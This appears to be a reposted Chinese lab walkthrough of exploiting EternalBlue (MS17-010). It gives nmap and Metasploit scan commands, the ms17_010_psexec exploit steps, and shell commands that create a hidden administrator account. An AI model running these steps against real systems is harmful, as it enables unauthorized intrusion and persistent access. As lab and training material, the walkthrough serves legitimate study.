Eternal Blue永恒之藍漏洞利用
0x01 漏洞介紹
什么是永恒之藍漏洞:惡意代碼利用Windows系統的SMB漏洞可以獲取系統最高權限,師傅們掃描開放445(檔案及列印機共享)埠的Windows服務器,對該漏洞進行利用后無需用戶任何操作,只要開機上網,即可向目標靶機植入遠程控制木馬,惡意插件等,哎呀其實就是那個不要臉的勒索病毒原型,
0x02 埠掃描
使用nmap對靶機進行埠掃描探測445埠是否開啟:nmap -sS 靶機IP
0x03 漏洞掃描
思路一:nmap腳本定點掃描:nmap --script=smb-vuln-ms17-010 靶機IP
思路二:msf腳本定點掃描:1.use auxiliary/scanner/smb/smb_ms17_010;
2.set RHOST 靶機IP;
3. set THREADS 10(整快點);
4.exploit;
注:關了你那個防火墻
掃出來有漏洞就是這樣的:

0x04 漏洞攻擊
使用msf中現成的exp攻擊即可:
1.use exploit/windows/smb/ms17_010_psexec;
2.show options;
3.set RHOSTS 靶機IP;
4.exoloit沖;
注:別忘把網路整明白兒的
成功之后是這樣的:

0x05 提權
使用在記憶體中混淆的shell ,meterpreter進行新建用戶并提權操作:
1.shell;
2.whoami;
3.net user zmy zmy /add;
4.net localgroup Administrators zmy /add;

成功穿上小馬甲,提權成功可使用新建的用戶進行后續操作了:

后續?后續就沒了自己慢慢悟吧,拿key閃人:)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/298054.html
標籤:其他
